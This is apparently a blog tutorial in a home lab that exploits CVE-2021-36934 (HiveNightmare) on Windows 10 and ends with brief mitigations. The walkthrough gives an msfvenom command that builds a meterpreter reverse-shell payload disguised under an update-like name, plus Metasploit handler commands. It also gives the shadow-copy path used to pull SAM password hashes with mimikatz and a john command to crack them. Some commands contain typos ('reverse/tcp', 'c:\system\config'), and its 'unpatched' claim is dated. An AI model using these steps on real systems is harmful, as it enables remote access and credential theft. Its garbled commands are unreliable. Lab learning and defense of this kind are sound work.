Windows Privilege Escalation - Offense and Defense!





Windows Privilege Escalation

Prerequisites: A windows VM, A Linux attack box, Empire/Metasploit for shell access (not demonstrated).

 


Vulnerability Details

 CVE-2021-36934

Windows 10 and Windows 11 are vulnerable to a local elevation of privilege vulnerability after discovering that users with low privileges can access sensitive Registry database files.

The database files associated with the Windows Registry are stored under the C:\Windows\system32\config folder and are broken up into different files such as SYSTEM, SECURITY, SAM, DEFAULT, and SOFTWARE.

As these files contain sensitive information about all user accounts on a device and security tokens used by Windows features.

This is especially true for Security account Manager (SAM) file as it contains the hashed passwords for all users on a system, which threat actors can use to assume their identity.



Environment Setup

Setting up a VM (windows 10) in VirtualBox:

Download VirtualBox client and install it

https://www.virtualbox.org

Download a fresh Image of Windows 10 from Microsoft’s official Website.

https://www.microsoft.com/en-us/software-download/windows10

Install VirtualBox and install Windows 10 in it.

 



Setting up a Kali Linux (Attack Box in Virtual Machine)

Download Kali Linux pre-made machine from offensive security’s Website / Kali’s official Website:

https://www.kali.org

https://www.offensive-security.com

Install it as well in the VirtualBox.

 



Creating users in windows

Open your newly installed windows. You’ll be logged in as a administrator by default. Create a low privileged user

 

Reference Screenshot:


 

After creating the user, log out and log in again as the low privileged user.

 



 

  Gaining Access from Attack Box

Open up Kali VM (the default username and password is kali:kali) and launch Metasploit. (Make sure to update the repo to avoid any error—sudo apt update && sudo apt upgrade)

Create a executable for windows with meterpreter:

 

msfvenom -p windows/meterpreter/reverse_tcp -a x86 –platform windows -f exe LHOST=<local-ip>  LPORT=4444 -o /home/kali/update.listeners

 

Transfer this payload to windows and execute it.

Then go to msfconsole and start a listener:

 

Reference Screenshot:


 

Commands used:

  • ·       msfconsole
  • ·       use exploit/multi/handler
  • ·       set payload windows/meterpreter/reverse/tcp
  • ·       set LHOST eth0
  • ·       set LPORT 4444
  • ·       exploit

You’ll get a reverse shell (cmd).  For demonstration purpose we used windows cmd.



Demonstration

Windows 10 and Windows 11 Registry files associated with the Security Account Manager (SAM), and all other Registry databases, are accessible to the 'Users' group that has low privileges on a device.


With these low file permissions, a threat actor with limited privileges on a device can extract the NTLM hashed passwords for all accounts on a device and use those hashes in pass-the-hash attacks to gain elevated privileges.


As you can see, we can’t access the file. Since the file is always being used by the OS. BUT, the registry files including SAM is always backed up by windows Shadow volume copy. We can take advantage of that.


As a threat actor, we can use win32 device namespace path for shadow volume copies to access the file.

\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SAM

(Enter this command in mimikatz to get all the NTML hashes)



Getting NTML Hash

You should use mimikatz to perform this task to get NTML hash of all the users on the machine including local_admin. Then compare the hash against any wordlist eg:”rockyou.txt” to get the password.

Example command: john <hash_file> --wordlist /usr/share/wordlists/rockyou.txt









How to Prevent The Exploit

Currently there’s no patch for this vulnerability. But, you can delete the shadow copies and restrict access to c:\system\config

Note: Delete the backuped up shadow copies before restricting access to system\config.

Commands: 

Deleting Shadow copies: vssadmin Delete Shadows/All


Restrict Access: icacls %windir%\system32\config\*.* /inheritance:e






Final Thoughts

So far, this vulnerability hasn’t been patched yet by Microsoft. Security researchers suggest that every corporate business or local businesses should do the mentioned steps and disable access to c:\windows\system32\config folder for everyone but local administrator and domain admin and delete the shadow backup copies to prevent this kind of situation.

3 comments:

Powered by Blogger.